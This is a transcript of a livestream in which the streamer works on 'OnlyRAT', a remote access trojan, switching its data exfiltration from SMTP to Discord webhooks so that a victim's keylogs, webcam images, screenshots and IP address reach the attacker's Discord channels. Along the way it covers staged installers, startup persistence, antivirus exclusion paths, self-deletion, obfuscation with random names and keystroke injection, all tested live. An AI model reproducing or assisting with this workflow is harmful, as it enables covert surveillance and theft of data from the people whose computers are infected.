Yo, hey hackers. All right, cool. We're live. Yeah. It has been like hot minute and a half since I was live last time. Let me check my audio and stuff because I know sometimes not everything will be working. All right, cool. Yeah, we're good. All right. I know not everyone on Discord has notifications on and such. I'm gonna have to go over there on the Discord server and let people know that we're live. Let me find my YouTube channel. Let me actually make this a new thingy. Here, I can show you guys my screen. Awesome. So yeah, let's just copy the link real quick, and let's go over to Discord. We'll ping everyone. Every single person on the Discord server will know that we're live. Add everyone. Live on YouTube, and I'll just throw the link in there. Let's do that red circle. I think that looks kind of like the. There you go, live circle. All right, and yes, dude. So yeah, let me get some water. Did I run out of soda? It's like my last sip. Damn. All right, let me get some actual water because I said it isn't the best for you. But yeah, how we doing, guys? I know it's been a. Please send the Discord link. It is in the description, but I will send the Discord link regardless. I don't know. How do you send? I'll just send it to the announcements. Copied. All right, awesome. Here you go. But yeah, that's the thumbnail from our previous streams. I haven't streamed since that Sunday. What Sunday was that? Was that 2 Sundays ago? Yeah, that was like the 13th, right? Dang, it's been a little bit since I streamed. Anyway, yeah, join the Discord. Discord's like that. It's a pretty cool establishment we got. Let me move this here, because it is super cold where I'm at right now. It's like 20 degrees outside. I'm like, dang. All right. So the question that you guys actually came here for, regardless of my BS, excuse me, what on earth are we doing today? I swear, every time I stream, my hair looks super weird. I never really check the mirror, and I kind of just hope it works out. Alright, that's decent enough. But yeah, today we are going to yeah. So if you saw my video, actually let me show you guys. Let's go on an adventure. Alright, let's go on the good old YouTube channel. And if we go on videos, why is the live stream all the way down here? Alright, anyways. Yeah, so Google can suck my blank video. Yes. This video was about me complaining about Google basically removing the less secure app access feature, which OnlyRAT uses to send malware or send the IP address back to us. So what we need to do is find a alternative, right? So I asked the great community. This is the wrong video. There you go. So I asked the great community for some responses, for some thoughts, and this person right here, they changed their name. It used to be Bob Smith, but now it's still used. Appreciate it, bro. This person right here, they said try a Discord webhook, and I was like, huh, what's that? I know what they are. I've heard of them, but I never really like decided to invest into it. TK Gaming, hi, what's up? Welcome to the stream. So I was like, what are Discord webhooks and how can we use them? I think I saved. No, that's not the right thing. I think I saved something for it. And OnlyRAT maybe. PowerShell webhooks. There you go. So this person kind of was showing how you can send stuff to the webhook, and I was like, interesting. So we can send information in PowerShell via Discord and such, which is pretty cool. I never knew you could do that. So that's what we're going to be trying to do with OnlyRAT. So instead of using SMTP, what we are going to end up using is Discord webhooks. So that's kind of the mission for today. And I guess we should get started. It's been a hot minute since I streamed like straight up with you guys. It's been a little bit. But yeah, we're back at it, I guess. So let's go into, I think it's in my malware directory, and then projects, OnlyRAT. There you go. There you go. Actually, I'll go ahead and go on the GitHub. When was the last time we worked on OnlyRAT? There you go, OnlyRAT. The only rat you'll ever need. So OnlyRAT beta, I think version 2. We're on version 2 right now. What version are we on? Version.txt. Yeah, we're on version 2.0 right now, I think. It literally says version 2 right there. Alright, I could have just read that. My bad. Machine Man, what's up, what's up? Yeah, finally back on OnlyRAT. It's been a hot minute. When was the last time we made a February 21st? Dang, it's been like a whole month and a week. It has been a month and a week since we worked on OnlyRAT. I feel bad. But we're back. We're back. What are we doing? Yeah, I literally forgot. Oh, I was going to give you guys the link in case if you guys did not have the link. Here you go. If you guys want to check out the project. There it is. Cool. So let's go ahead and keep working on this. Yeah, so I'll leave that in like a pinned tab somewhere. I'll actually should I leave that over there? This is just like the stream information. If you guys want to see what I see. Alright, I'm gonna just pin that all the way back here. I'm not really gonna look at it. I have my phone down here to see the chat. So I'll just leave those up there. We don't need this anymore. So yeah, Discord webhooks. I guess we're going to have to play around with this, right? I do have Discord open. I made a little server. I don't know why some of my friends wanted to join on here. That's cool. But yeah, so this is basically what we're going to try and do. So basically the whole idea with Discord webhooks, right? Let me go back on my face. So the whole point of using Discord webhooks with OnlyRAT is, first of all, we're replacing SMTP, which, you know, Google said, you know, gave us the middle finger with. So instead, you know, Discord webhooks, what I was thinking is that we could have, or you guys could basically make your own Discord server. Super easy to do. You just click a button in the bottom left area of your Discord and it says create server, and you can create your own server, and then you can create a Discord webhook. Actually, we can go through the process together, but first, yeah, so you basically create a Discord webhook on your server, but that basically allows you guys to kind of split up your Discord server to manage all of your malware, all of the output that you guys would get from OnlyRAT, right? So instead of just having to manually pick off, like, let's say the webcam images, like, you know, OnlyRAT takes pictures through your webcam, right? So let's say you're getting all these pictures through the webcam. Instead of having to, like, get those pictures from, like, how it does with the SCP stuff, it can just send it to your Discord, and you can have different channels for all the different things. So you can have a channel for keylocks. You could have a channel for, I don't know, the webcam images. You got one for the screenshots. You have one for any data that we're getting back from the OnlyRAT. Water tastes like so bland. Oh my gosh. I don't even know why I drink it anymore. But yeah, let's go ahead and keep working. Oh my god. So yeah, this is Planet Cosmos, some random test server I made. But if you go into server settings, I think, and integrations, yeah, you can create webhooks. This was some random test one I made. I actually have not played with webhooks yet, so let's create a webhook. Captain Hook, I like that. We need a cool, bruh, it's midnight in my country and you have a whole white mode. I am so sorry. I am so sorry. Hold on, let me flashbang you again. Alt Shift D, there you go. Dark mode. I am so sorry. Can you ever forgive me? Coffee is the new water. Bro, I literally can't drink coffee, dude. I can't. It just tastes so bad to me. I can't. No matter how much sugar, cream, caramel, whatever you put in coffee, bro, I can't. It tastes like dirt. You can put ice in there, iced coffee, hot coffee. It still tastes like dirt. I don't care. It's not like at least half my subscribers. It's just like from my bad opinion on coffee. Yeah, so let's follow their instructions, right? So, I'm sure you guys could probably send stuff to this Discord API thing too. I don't really care. So, we're going to need Windows. So I opened up this. I couldn't put this in dark mode. I don't have Windows activated, do I? Hold up. Do I have Windows activated? Windows key I. Get even more out of Windows. Yeah, so I don't think I have it. Like if I go on personalization. Yeah, you need to activate Windows. Freak you, man. I actually need to get a Windows key. If you guys would be willing to donate a Windows key, I would be very much appreciated so I can do some more malware stuff. Because I don't want to keep resetting like my VMs and such. But coffee and tea are the best. Tea's pretty cool. I don't have anything against tea. I actually like Arizona and stuff, so tea's pretty cool. Unsubscribe. Damn. But yeah, so let's actually, do we have like Visual Studio Code? We do. All right, let's go ahead in PowerShell and take your time. Do we have like a folder for this OnlyRAT stuff? No. All right, we'll just CD into like, honestly, we'll just do it here. No one cares. All right. What we'll do is we need to make a PowerShell file. We'll just do Cosmodium, and we'll do test.ps1. This VM is not doing too good. It's kind of Cosmodium. Oh yeah, this isn't Linux. My bad, guys. It's code on Windows. I spent way too much time in Linux. Code. There you go. I can make this full screen so that was a little bit easier for you guys to see if you want. Oh man, I'm about to go to bed. Oh dang. You can stay up. But the stream will still be up in the morning if you guys want to see it. The new version, awesome, cool. I definitely asked. So right control. All right, so it's going to ask you to put the hook URL. Do they have like a full thing all together? Perfect. So let's take inspiration from this code and paste it into our Windows virtual machine. All right, so let's get our API key. I honestly don't care if you guys get this. We need a cool name. Anyone have a cool name we can give our test bot? I want to give a cool name. You guys have 20 seconds to come up with a cool name. Otherwise, I'm going to put something random. Here my watch. Clock is ticking. If no one does anything, I'm going to just put something dumb, so. I'm getting tired of water. I need to get like Propel. Obscure Botnet Jr. I'll combine the two. What the hell? Obscure Botnet Jr. Obscure Botnet Jr. Awesome. Alright, and we'll have them go into our key logs so we can have some sort of temp. Let's copy the webhook, save changes. Yeah, copy the webhook URL. And let's put them in here. Feel free to send me some stuff through this if you want to. So you can enter the message here. Yeah, so we don't need to do the @ stuff because we're not doing multi-line strings, I think. At least right now, we're just doing tests. So we can say hello. We'll just do hello. I think hello is just the good, solid go-to. Never can go wrong with hello. All right, and then you have the payload. So payload equals all of that. So why do we have to separate this? Can't we just do content equals this? Am I tripping? Am I tripping? No? Alright. And then run this. Alright, so in theory, if we just do dot slash p or dot slash test, no, not dot slash Leanne K. We need the PS1. Oh, we didn't save this? Does our they not have automatic saving? Dang, sounds like a cannot send empty message. What do you mean empty message? The message is not empty. Oh, were those @ signs important? They may have been. I honestly don't remember what these do. I used them like once before. I'm probably not even doing this right. Let's go back. Actually, we'll run this real quick. Yeah, that's what I thought. I'm doing something wrong with it. Alright, fine. We'll do more than hello. Actually, let's check the Discord and see if anything is even doing anything. Keylogs channel, right? That's not what I meant to do. Cool. Keylogs. Awesome. So we should expect something in here if we can get this to work. So let's go and what did it say? It said hello. Maybe honestly, I need to remember like what this looked like. You can enter the content with a here string, new lines as well. Enjoy. Alright, I'm gonna just assume you may need to you may need to add this to the command. See, maybe if I actually read, I might be able to do some good stuff in my life. If we go up /test.ps1, so if we run this and then add content type application JSON, it still doesn't do anything. Okay, interesting. Dang, that sounds like a... I wonder why that's not working. We'll have to try something else if we can get that to work. But wait, there's more. Let me write control. Alright. What seems to be going the problem here? What seems to be the problem here? Altogether, this is what the code should look like. Content, @. You know, I'm gonna just copy this bottom half again and then just replace it and just throw that honestly, and then see just if that on its own is enough to get it to work. And if not, then we know that we have stuff we need to fix. So yeah, perfect, something like this, and we're literally just going to run this. There's a parenthesis missing. All right, so let's run the normal test.ps1. That didn't work. If we run content type, what is going on? Why is there so much noise? Damn, my watch is going off. All right, sorry about that. So do we need like Discord installed on the target PC to make that to work? Because if that doesn't work, then we're going to have to try something else. Maybe a different SMTP server or a service. But I'd really like to see if we can get something like Discord webhooks working. Oh my gosh. Do your invoke REST method command and layers of PowerShell. URI hook URL method post. All right, let's see if we can find a different one. So Discord webhooks, and then we can do PowerShell. So that's the one we're already on. So creating. We just need to check out some of these. creating a Discord webhook and a few lines of PowerShell. I love how they're blurring mine out. I just have mine open to the internet. Body equals this thing. Oh, so you need to have your what? Why the username? Choose a name. Choose a name, the channel, then copy. Oh, do we need to specify the channel? What? Oh, that's for an embed, right? No, we just need a message for real. Try to make it easier with curl. Damn, that's crazy. All right, I mean, we can try this. I don't think we want to do so instead of content of being the link. Oh, got you. I kind of see how this works. Kind of. Hello, Cosmo. How to join Hacker Discord? Join. It's linked in the description. Or are you trying to join this? You guys can't join this one, but you guys can join the actual Discord server. This is just for. I'm gonna delete this in like a week. But y'all can join the Discord server. It's linked in the description. Let me see. Discord. All right, so let's see if we can get that working. Where's our Windows virtual machine? Right here. All right, let's go. And I'm going to highlight this entire thing and comment it. Oh, that's not what I meant to do. Comment it out. All right, that's still not what I meant to do. All right, let's try this again. All right, we'll just go down here and paste all this. So let's go ahead and copy this. Copy and paste it here. All right, awesome. Then what do you mean username? All right, you know what? We'll just try this honestly and just see if this works. What I'm wondering is if we need. Oh, did that work? Did that work? Wait, where's Discord? Oh snap, that worked, dude. Oh snap. Yo. You guys see this? That went from our virtual machine to our Discord server. Oh wait. So what type of things can we do? Instead of this. Alright, so first of all, freak all this code from before. Y'all can get out of here. Yeah. So now we have that. So instead of username, can we do right, so if we do right control, it does the nomad, and then it does this stuff about whatever. So instead of this, can we just do let's also comment this out. Control Shift D, I think. No way. How do you duplicate a line again? It's like Alt Shift down. There you go, and then Alt. Alright, yeah, we're good. Thank you. So instead of giving this, we can do we'll just do hello world, and then let's try that. Let's see what happens if we run that. So if we run that and then go to our Discord server, it says hello world. Oh snap, dude. Oh my gosh. So can we send files? Wait, how come I've never heard of freaking webhooks before? This is amazing. This is astronomical. So can we get... Alright, so I'm gonna just kind of do some tutorial comments here. So we'll do embeds. So that's how we would do an embed. And then we can do text. And then that's how we can do text. And then... Alright, so in here, let's see if we can do files. File/attachments. Alright, so what we'll do is... Oh man, hold on. This is so cool, dude. Can we get... let's just say... let's say content. Oh, whoops. How do you do this again? It's string content. So string content is equal. And let's say it is equal to... get content of let's make a new file. That's not what I meant to do. No, close. All right, hold on. So let's just echo hello world to a file.txt. All right, so now we have a file.txt. So if we get content file.txt, is that how that works? I'm super rusty right now. I have not touched OnlyRAT in so long. I don't know most of my code. I literally forgot like everything. Oh, so it's still, oh, it does hello world. Yeah, because that's what's in the file. Can we rewrite the file, make it a little bit more clear? So instead of echoing hello world, we'll just echo subscribe to, let me make this bigger for you guys because I know you guys can't see that too well. Subscribe to Cosmodium CS. There you go. So if we were to run the test.ps1 in our Discord server, where's Discord? Subscribe to Cosmodium CS. Okay, can we actually send a file? So that's file content. All right, so the last thing I want to see we can do is send file files. So we'll just do attachments. So if we do content, there you go. So if content is equal to file.txt, I don't know how well that will work. I don't know if we can send files. Can you send files like that? Yeah, file.txt. How would we get the actual file? Oh, my code is super, I'm like super rusty right now. Let's go over here and open this up in Cosmodium current directory. Dang, it's been a Brit. Look how long this freaking code is, man. Oh my lord. Like OnlyRAT is like at 500 lines right now. This is the Python console. Oh my gosh. What were we trying to do? Yeah, so SMTP installer, this still works technically, but you guys would just have to like use a different SMTP service. Alright, but we'll figure that out for another day. Let's see if we can get some of this other stuff working. Let me get some water while we're here. So let's go Libre and see. So yeah, we got the content to work. That's fine. We don't need that anymore. Thank you, person. So can we send files? Send files in Discord webhooks. This is so cool, dude. How do I send files in a Discord webhook? It is not possible to send files. You can send files just like this. That's what I'm saying, bro. Oh, that's a lot of code. Is that worth it? Content type, yeah. It's just the API, and it seems possible. The header content type, multi-part form data. There's a more similar approach. Webhook link, file path, and then this beefy thingy. Document and the file.txt. Huh. Is that right? Can we try this? Alright, so we'll do a nope, that's not what I'm trying to do. How do you make a new file? Control N. There you go. Alright, so we'll paste this. We'll save this as send. Oh, wait. Cancel. This is cancel. Yes. Don't say it, sorry. This is our Linux. We need to go on Windows. There you go. Control N, Control V, Control S, send file .ps1. So let's get our Discord webhook. Again, this is all for testing and such. So, wow, dude. Sister, what's good? What's good? What's good? What's good? What's good? How you doing? So if we do this, right? So instead of C users, if we just go in our current directory for file, whoa, bro, whoa, slow down now. File, there you go. File.txt. If we just get file.txt in our current directory, can we get this to work? If we send. All right, I'm so confused on what's going on. What? Clear. All right, send /send file.ps1. Interesting. C / users blue C file.txt. I think. I honestly have no idea. Alright, you know what? Honestly, we can send file content, so I'm not too concerned about sending files right now. So we'll close that. But dude, we got Discord webhooks working. This is the moment we've all been waiting for. Most definitely. Cool. So we got Discord webhooks to work. So we can send data from Discord from computers to Discord. So now what we need to try to do is make a new installer. So yeah, what we're going to do is go in our File Explorer. There you go. Take your time, bud. It's okay. So send file.txt or .ps1. We can delete this. Send file. Whoops. Oh, my username is redrow. So I guess I was using the wrong username. What? This computer's tripping right now. Sorry guys. This PC, local disk, users, redrow, and then let's get our test.ps1. Why is there a test shortcut? All right, delete the test shortcut. Delete this. We don't even need our file.txt no more. So yeah, our test.ps1, we're going to move that into our shared folder. So I think I still have that bash alias to grab stuff from my shared folder. So I can do right control, go out of here into my terminal, and lists, assets, installers. Yeah, so let's cd into installers because we need to make our new installer. And in here, I'll just do grab test.ps1. I think that's the name of it. There you go. So if we list our test.ps1 came from our shared folder. This is a bash alias. You would just have to move the file from your shared folder to your current directory. Yeah, so this is our Windows computer. Right now, we actually don't need this anymore. So we can close all of these. Yeah. What is going on with this, bro? All right, yeah, so we don't need our Windows virtual machine anymore. So let's go on Discord. So yeah, you guys can see the obscure botnet junior. Oh, you can change the name of it. Oh, so that's what the title does. Oh. This is good, because that means we can specify information coming from the Discord bot. I mean, not the Discord bot, coming from the target computer. How am I doing? I'm doing great, man. I'm doing great. I'm chilling. I'm killing. I'm not killing, but I'm definitely chilling. But I'm doing good, man. How are you doing? So So what we need to do is actually make our webhook installer, right? Let's close this. So we'll call this Discord webhook dot cmd, I guess. All right, so we're going to take inspiration from our old code, and oh, look how obfuscated it is. Ugh, look at these names. I love it, you know, when you set the xnjfykecchcd. All right, this is a current directory, I think, by using the percent signs on it. Man, this hurts my brain a lot. So now that we have Discord stuff working, another thing we can actually do is if I open no, how do you open up the all right, I forgot the stuffs. Cool. So oh yeah, it opened up PowerShell because it's this freaking PowerShell file. So you guys will be able to put in your webhook right here. So echo, I'll just do Discord webhook in all caps. So hypothetically speaking, you should be able to put that Discord webhook in that file. We'll need a randomly named file. All right, so if we go into we might need that, honestly, so I'll go over here, Control Shift O. We'll go into our malware directory. No, it's in soft. No, cd to PowerShell. Yes, sir. Random text. So if we do pwsh and then a random text, it will give us random text. Super ingenious. Oh, I forgot about tmux and stuff. Terminator. Yeah, dude, I forgot. I literally forgot how to copy. How do you copy stuff out of tmux? Because I've been playing around with tmux for a little bit. It seems pretty cool. But it's definitely weird. Like, it's kind of unnecessarily weird. So how do you you only know why it always works. I'll keep that in mind. So yeah, we can get rid of that. We got that to work. Got that to work. We got this to work. All right. Can we just do random text generator? Random text generator. Random text generator. Awesome. Appreciate it, bro. We need. No, I just need like can you select? I just need random super small random text. Characters. The number we need. How many characters are in all these? I guess we can keep it moderately consistent. How many characters is that? 10 characters. All right, so we'll do 10. Generate. Oh, perfect. It's the best obfuscation site that has ever existed. All right, the reason is we need to change that name because that name is identified by one of the installers for a different process. Oh, so I guess we're going to have to rename some of these files too, to make it more clear on what they're doing as such. Even we can at least try. My camera is broken. I didn't even know this. Let me fix my camera real quick. I'm so sorry. External cam. What on earth happened? What? Oh my gosh. My whole computer froze for a solid 2 seconds. I didn't even know what was going on. Save the machine state, yeah. Now my computer's glitching. I mean my camera's glitching. Dang, everything just broke on me, bro. What the heck? Now there's lag? Oh my gosh. Let me shut down the virtual machine, give it a second to breathe. Let me see if I can fix this. That's why I hate streaming, man. Streaming is Alright, let me see. External camera. let's see if we can. All right, I'm gonna just select a different camera, and then, bro, I have no idea what's going on. All right, there you go. I am so sorry for all of that. Save. All right, cool. It looks better. All right. Yeah, freaking streaming, man. I should have yelled no at it, Machine Man. I should have yelled no at it. So we have this whole thing working. So you guys put your Discord webhook in here, and it goes into the startup directory, and then it will download stage1.cmd. So basically, this entire installer so far has been designed to work with SMTP, which means we need to make a new stage 1 and a new stage 2 in order for it to work effectively for our other files. So great, it downloads this, and then it adds it to the startup directory, and then it downloads a stage 1. All right, so instead of a stage 1, we need to make a new file. What type of file is stage 1? So stage1.cmd. Yeah, so we'll do a different file. So instead of stage1.cmd, we'll just do Discord webhook. So we'll do dw1.cmd. And this is going to go in OnlyRAT and payloads. Oh, payload / dw1.cmd. I keep doing .com instead of .cmd. So save. Awesome. So this dw1 is basically going to be kind of a replicate of the stage 1. But instead of it doing getting to the stage 2, this is going to need to get a different stage. So yeah, so it gets this. So instead of stage 2, we need to make a DW2 as well. So save it to payloads, and then we'll just call it dw2.ps1 and save it. Oh my gosh. Alright, so what this is going to do is download that dw2.ps1 file. And we can honestly output it as the same file, right? Because this is what gets... Yeah, this is fine. Yeah, we can have it be downloaded like that. We've been streaming for 42 minutes. I got like no work done. Oh man. Alright, I'm just checking the camera again, making sure it's not trifling anymore. It looks better. So I have no idea what happened. My cool mouse stopped working and like everything broke. I was like, oh my god. Alright, so let's actually, try and get some work done. So the DW1 is pretty much done. It just downloads the DW2, gets us admin permissions, runs the DW2, and deletes itself as weak FK nudie. So is that what it gets saved as? Alright, then we'll keep that as well, honestly, to avoid confusion amongst the code. So Discord webhook, the CMD is done, DW1 is done. So DW2 is basically going to be the new version of the stage 2. So we can get our stage 2 and copy this whole thing, paste it in there, and awesome. So, oh my gosh, I hate PowerShell. I hate it. Look at this code. How do you even? I didn't know what I was doing. I was on some different stuff. But no. So let's say we can have different names, right? So we can have because we can have different usernames for the bot. We can have one of the usernames be like keylogger when it sends keylogger information. One of the usernames say something else. I don't know. Alright, cool. Dang, man, it's been a while since I streamed. I didn't even realize how long it's been since I streamed. So this is the installing process for a lot of the basic stuff. Yeah, so the thing is, we can't actually get the content of these two files. Yep. So right here, any references of these files and stuff. Yeah, so this whole SMT process has to go. Oh my god. So what we're going to basically do is generate the file and get the content. Got more done than me on the clock right now. Yeah. I mean, when I'm streaming, I kind of have to get stuff done because you guys don't want to just sit here and watch me talk for an hour, 2 hours, however we stream. So this is, oh my gosh. So everything else here is fine, right? We just need to get rid of the, alright, so let's fix this. So first of all, we get rid of this line, the entire SMTP process. Actually, wait, hold on. I shouldn't have gotten rid of this line. Let me comment everything out so I can still account for it before I get rid of it. Freaking genius. I think it was Machine Man who actually told me to comment stuff out one time, and I was like, oh, that's a great idea. So make directory, and then it'll make a temporary directory of a random file name. So why the RPL? Why this directory? Oh my gosh. So what is this used for? Oh, is this the password or something? What's RPL? Oh, it's the function. Oh, got you. This is the function that makes random text. I literally forgot how my own code works. This is how long it's been. So we don't use this outside of this SMTP process. Perfect. So what we'll do is Control Shift or comment out, and then we'll do Alt Shift down. What? Does Alt Shift down not work? Isn't that the syntax I just did? Alt Shift down. What? All right, Control Shift D. I swear. Oh, it's swapped on my Windows and Linux. That's what it is. Oh my gosh, the freaking inconsistency. So we need to get content of our Discord webhook text file, which is this one right here. So we'll get the name of this file and replace it in this file. And then can we keep this random username? I'm feeling it. I feel like it's I feel it's special. It's calling to me. So we can get rid of the SMTP process. Dang. In another life or something. So what does this thing do? What on earth is this? So it gets a random temp file. Oh, so it creates a randomly generated name, sister location to the working directory, so we can download the malware into that working directory. Yeah, I remember this. And then it starts deleting all the stuff. So when we get the... Hold up. Hold the phone. Hold the phone. When we get the content of these two files, did we ever delete it? Yeah, so we delete them down here, right? Yeah, okay, that's what we do. So we delete the content of those two files right there. So this is when we delete them. See, I need to keep notation of this. Can't take credit for that. I was the use of cache error. Oh, gotcha. What is this? This is the actual file. So that's the self-deletion portion. What is this one? Is this the rat? Oh, so this is the important. This is what we need to get the content of right here. So let's get rid of the SMTP process. All right, and then we'll delete because we're already deleting. Oh, we need to delete the special file though. What's our special file called? Not this one. It's like the it's the one we're getting content from. Oh, this code literally hurts my brain to read. Yeah, this one right here, the get. So we need to copy that and remove this .txt. Perfect. I'm so sorry, you guys. You have to read this. Hello, it's your favorite intern. What's up, Elite? Oh my god, this hurts my brain. Alright, so all we need to do is get the content of this directory. So this is the text file, right? The username .rat is the name right here. Alright, perfect. So what directory are we in? Make directory in the temp. Oh, so it's in the startup directory right now. So while we're here, this is where we'll actually do the Discord webhook process. So what do we need? So we need the webhook URL. So we'll call this webhook URL. I'll just do webhook for now. Obviously, we're gonna have to obfuscate this entire thing in like 2 minutes. But hey, that's what we'll do in there. So we'll just do honestly, the single quotes work in this thing. So then we'll just do, oh wait, the webhook is in the file. Yeah, so that's our webhook. Got you. Alright, so I'll just do webhook for now, just so we can remember it and then obfuscate it. So we have our webhook that we get the content of. Got you. So what do we do after that? We get the webhook, then we need to get our webhook body. So we'll copy this, and what we'll do is we'll send the file content version. So we'll have the username too. So we'll do so uncomment this, and honestly, I just need to tab this. Why is the tab not working, dude? What is going on? Is something, what's wrong with this thing, dude? Oh no, Elite again. Alright, I just need this to work. Why is my tab button not working, dude? I have no idea what's going on. Alright, I honestly am just going to close this and open it again because I don't know what's going on with code. Alright, is this the right directory? I have no idea. Code, current directory. Alright. Oh, that's the installers? Whoops. No, cd, or I just do codium ... right? There you go. Alright. We're back in business. Alright. So, if I hit the tab key, there you go. I have no idea what was going on. So yeah, instead of body, we'll just do body with lowercase b, just so we can account for everything. So we have the webhook, and we have the body of our, so instead of getting the content of our file.txt, do we get the content of this variable that I can't remember? Oh, we used to send it to ourselves through SMTP. That's right. Yeah. So what we can do is get content this thing. So if I just do configuration file, right? Let's say we make that the username. Or we'll just do config. Do config. So that's the username, and then the content is equal to that. So then when we do the actual SMTP thing, let's copy this, paste that down here. We'll invoke this thing UI. So this will be the webhook, and then this will be the body. Oh. Alright guys. So in theory, that should work. So now what we're going to do is confuse ourselves. So we'll do a good old Control H and replace all our webhook appearances with, let's generate some new text. Yeah, that one looks awesome. So we'll replace it with this. So we'll replace this, and then our body we need to replace. So let's generate this with, so Control H, So replace body and body. Awesome. So that should be it, right? Oh my gosh. So in theory, that's going to send the code, I guess, to us, right? And then what we'll do is, okay, so that sends it to us. So this is SSH stuff. This is the registry stuff. So all that should still work. Yeah. So it will send it to our Discord this time instead of sending it to our other stuff. So let's see if that works. Let me go out of here real quick. So we'll cd out of here and get, isn't it get update? Isn't that the thing I made? And then we can just do Discord webhook test. Oh, did my freaking key? Oh my gosh, my key for OnlyRAT expired. Alright, let me add a new key. I didn't know it was that long. It's been so long that my freaking GitHub key expired. That's wild. Has it been that long since I've worked on this project? Alright, let's sign into GitHub. I can't show my screen because like I would be showing my GitHub key. So sorry about that, guys. That's how long it's been since I've worked on this project. Dang. So let me go on here. I'll be quick. Settings, and then let me get a new key. Or not key, tokens. Alright, so generate new token. I'll call this OnlyRAT. Let's call this payloads, honestly. Workflow, because I might use this more. Workflow. That looks good. That looks good. Alright, generate it. Why is the bot called obscure? The chat picked the name. So. Alright, let's copy this. Let me go. Let me see into dot. Alright, so let's echo that into, I don't know, sorry guys, I can't show my screen. I'll be quick. Token dot. Alright. So if I go into, so it's like get remove. Oh, it's get remote remove origin, and then get add or get origin, get remote add origin, and then the origin. So it's https:// this thing at github.com/Cosmodium CS/ OnlyRAT. So now if I get update, and I do Discord. Alright, let me go on to this. I promise I'll be quick. I'm so sorry. Alright, it looks good to me. Let me actually clear this terminal. Alright, so I think, alright, there you go. Sorry about that, guys. So let's cd into, or I can do malware, cd into projects, OnlyRAT. Alright, and I think if we just do git update Discord. Alright, and then go into this. It says Discord webhook tests, but technically, I mean, it should be up to date, right? If I go into payloads, we should see our DW1 to DW2. All right, so yeah, we can test this. We're going to pull out that virtual machine again that I had to close. I know it was kind of doing some stuff to my computer. No, because I'm not that sad, Tim. If you need to talk, I'm always there for you, man. You're basically irrelevant. That's what Cosmo was saying. Dude, I have not even been on Discord in like a whole week. So I don't know what you're talking about. Let's revive this virtual machine. Hopefully the stream stays fine. Dwight Schrute is using sec and a name yours too. Alright. Let's do this thing. Alright. So we're gonna have to share the let's go into PowerShell and File Explorer. That's not PowerShell. That is Visual Studio Code. I don't know how I thought that was PowerShell. Close. Let's go in our downloads directory. That's why I used to put stuff in the downloads. Oh, wait, this is the old SMTP installer. Yeah. So now, what we need to do is go in here. We'll do PowerShell. All right, awesome. So let's do code, and we'll make a new file. We'll call this Discord webhook .cmd. Alright, and what we'll do is, while we wait for this, we'll go over here, and what we need to do is go into OnlyRAT, installers, Discord webhook, and just copy this whole thing, copy it, and we'll go into this and save it. So it looks like, in theory, this whole thing should work. All we need to do is put our Discord webhook into here. So let's get our Discord webhook. Let's go. I have so much stuff open. Literally, I'll close this. Okay, so this is our virtual machine. Where is this? So let's close DW2. We'll close test. We'll close SMTP installer. Yeah, so all we need right now is the test, actually, because we need to grab this Discord webhook, and we'll go ahead and paste it. And in theory, that's it, right? And so if we run Discord webhook.cmd, it should hopefully work. Honestly, I didn't even open up any of the windows and such. All right, it's asking. So we got the other things. Oh, I forgot it's gonna self-delete. I should have removed that line at the bottom. I'm so dumb. I'm so dumb. Oh, it deleted the. Oh, it deleted the old one because it never changed the name of it. I forgot. I'm dumb. But we'll keep our hands away because I'm sure it's gonna do the pop-ups and such. Let me get a sip of water while we wait, because it does keystroke injection at some point in the installation process. I don't remember when. I think it's when we're confirming the registries. But in all honesty, like, we have no idea how well this is working. I probably should have opened up the other File Explorer windows so we could see, like, the progress and, like, the stages and such. That's how you know I'm rusty. Oh, there you go. There's the keystroke injection. Wait, so it should be done, right? If we go onto Discord. Why is your name obscure? Shake my head. Alright, appreciate it. Oh, that's my thing. Oh, obscure username. I didn't even noticed that the chat named it. So this didn't work. Why did you not work? All right, so what we'll need to do is we can close this. We just need the virtual machine. All right, so first of all, let's open this in like the top left corner of the spot. Perfect. And then we'll open two others. We'll open this one over here and this one over here. So we need to go to this PC, C, users, red row, app data, local. I'll copy this path right now, and then temp, and then this needs to go into, we can go in here. All right, we actually need to go into roaming Microsoft. Oh my God. Windows, start menu, programs, startup. All right, so I have no idea what either of these files are. So this is the boot up file. What is this law? Is this the Discord webhook? Oh, this is Discord. All right, so this is the Discord webhook. Why did that not work? That's a great question, guys. That is a great question, guys. Hydrate brain. Dude, I'm almost out of water. I should save it, no? I'm too lazy to get up and get water. I'm so like focused in on this right now. All right, what we need to do is, first of all, that file needs to delete when it's done, right? Why did it not delete when it was done? I have no idea. What we'll do is right control and we'll go over to, all right, so let's go ahead and open up all the parts. So we need our discord.cmd. This works. This downloads everything. That actually works. So we don't need to worry about that. DW1 seems to work because all we're doing is getting that DW2 PowerShell file, outputting it as this file, that PS1, adding the exclusion path, and running it. And then it'll delete this file, which is created by the this file. Now, all right. So then what we need to worry about is DW2. Oh my gosh, this is my least favorite file. The freaking system, the freaking SMT or the stage 2 and the DW2 files are so annoying because it's just PowerShell and it's all obfuscated, and I love it. Are you running Parrot as your main? Yes, I am running Parrot as my main operating system. Oh, whoops. Let me close this. There you go. Oh my gosh, I have so much stuff open. There you go. This is my basic Parrot. I have other wallpapers I'll use, but this is kind of the main thing. Where's my terminal? I can do a quick old neo fetch. Sorry, I always hit that button by accident. That's like the random button you hit when I like have to go away and such. That looks super weird, so let me redo this for you guys. I'm so sorry. How do you do this again? Oh my gosh. There you go. Oh my gosh. That took so much work. Here you go. Hope it was worth it. No, I'm playing. Run it without hidden. You know, that sounds like a great idea. I'm not even being sarcastic. That's like an actually good idea. So, do we even need this anymore? No, we don't need that anymore. Let's stick to this. All right. So where's our Cosmodium? So this actually gets our PowerShell. So it creates it removes any of the OnlyRAT users we'll have on the computer and replace it with our new OnlyRAT user with all this fancy PowerShell. That's what this is doing right here, actually. Then we got random text, create the random directory within the temp directory, and then get our current location, right? Get location, yeah. So that's our current path, which should be the startup path now. And then yeah, echo off to the CMD file in there, and then this is where we actually create our username.rat file. So what we need to do is just read that file. So get content of the username.rat, This works. Oh, I'm so dumb. I'm so dumb. We need to get the content of this file. Oh my gosh. We're not getting... Well, no! No! I'm not dumb. I'm not dumb. Hold up. Because what this is doing is... This is the username. This is the content we're sending to us, no? Yeah, we're supposed to send this. And then the URI is the content of that the law file. I'm just call this file law because of the first 3 letters, law. And then here, the law file's right there. Yeah. And that's the webhook, right? I'm not dumb, guys. I thought I was dumb, but I'm actually not. It's a fun fact. So, get IP address. Alright, let's just get the IP address of the computer. And then that adds it to the rat file, which we then get the... Alright, what we'll do is comment all this out. And that way we won't have all that stuff. Alright, so we're going to listen 